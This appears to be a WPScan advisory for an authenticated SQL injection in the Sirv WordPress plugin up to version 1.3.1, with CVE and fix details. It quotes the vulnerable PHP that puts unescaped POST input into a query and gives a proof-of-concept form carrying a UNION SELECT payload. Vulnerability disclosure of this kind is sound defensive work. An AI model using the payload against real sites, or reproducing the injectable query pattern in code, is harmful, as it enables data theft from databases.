Sirv <= 1.3.1 - Authenticated SQL Injection

Description

$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user.

$id = $_POST['row_id'];

    $row =  $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);

    $row['images'] = unserialize($row['images']);

    echo json_encode($row);

Proof of Concept

<form method="post" action="http://target/wp-admin/admin-ajax.php">
    <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
    <input type="text" name="action" value="sirv_get_row_by_id">
    <input type="submit" value="Send">
</form>

Affects Plugin

Image Optimizer, Resizer and CDN – Sirv

fixed in version 1.3.2

References

CVE	2016-10950
ExploitDB	40772
URL	http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/

Classification

Type	SQLI
OWASP Top 10	A1: Injection
CWE	CWE-89

Miscellaneous

Submitter	Lenon Leite
Submitter Website	http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
Submitter Twitter	lenonleite
Views	7435
Verified	No
WPVDB ID	8673

Timeline

Publicly Published	2016-11-10 (over 3 years ago)
Added	2016-11-21 (over 3 years ago)
Last Updated	2019-11-28 (7 months ago)

Our Other Services

Online WordPress Vulnerability Scanner

WPScan WordPress Security Plugin